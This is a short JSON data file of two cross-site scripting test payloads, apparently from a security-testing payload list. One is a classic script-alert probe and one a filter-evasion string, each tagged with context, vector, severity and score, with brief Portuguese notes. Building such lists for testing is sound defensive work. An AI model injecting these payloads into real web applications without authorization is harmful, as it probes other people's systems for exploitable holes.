[{"id":"xss-001","payload":"\"><script>alert(1)</script>","context":"reflected","vector":"html","tags":["basic","script"],"notes":"Payload cl√°ssico","severity":"low","encodings":["none"],"created_at":"2024-01-01T00:00:00Z","version":"1.0.0","score":15},{"id":"xss-002","payload":"';!--\"<XSS>=&{()}","context":"reflected","vector":"attribute","tags":["attribute","encoded"],"notes":"Payload de teste","severity":"medium","encodings":["html_entities"],"created_at":"2024-01-02T00:00:00Z","version":"1.0.0","score":40}]